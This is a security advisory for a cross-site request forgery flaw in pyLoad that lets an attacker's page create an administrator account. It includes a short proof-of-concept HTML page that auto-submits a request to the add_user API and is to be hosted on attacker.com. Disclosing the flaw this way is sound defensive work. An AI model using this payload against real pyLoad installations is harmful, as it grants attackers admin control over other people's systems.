Lucene search

K
githubGitHub Advisory DatabaseGHSA-PGPJ-V85Q-H5FM
HistoryJan 19, 2024 - 3:27 p.m.

Cross-Site Request Forgery on any API call in pyLoad may lead to admin privilege escalation

2024-01-1915:27:12
CWE-352
GitHub Advisory Database
github.com
24
pyload
api
csrf
attack
privilege escalation
security vulnerability

9.6 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

7.2 High

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

48.6%

Summary

The pyload API allows any API call to be made using GET requests. Since the session cookie is not set to SameSite: strict, this opens the library up to severe attack possibilities via a Cross-Site Request Forgery (CSRF) attack. This proof of concept shows how an unauthenticated user could trick the administrator’s browser into creating a new admin user.

PoC

We host the following HTML file on an attacker-controlled server.

<html>
  
  <body>
    <form action="http://localhost:8000/api/add_user/%22hacker%22,%22hacker%22">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

If we now trick an administrator into visiting our malicious page at https://attacker.com/CSRF.html, we see that their browser will make a request to /api/add_user/%22hacker%22,%22hacker%22, adding a new administrator to the pyload application.
image

The attacker can now authenticate as this newly created administrator user with the username hacker and password hacker.
image

Impact

Any API call can be made via a CSRF attack by an unauthenticated user.

Affected configurations

Vulners
Node
pyloadpyloadRange<0.5.0b3.dev78
CPENameOperatorVersion
pyload-nglt0.5.0b3.dev78

9.6 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

7.2 High

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

48.6%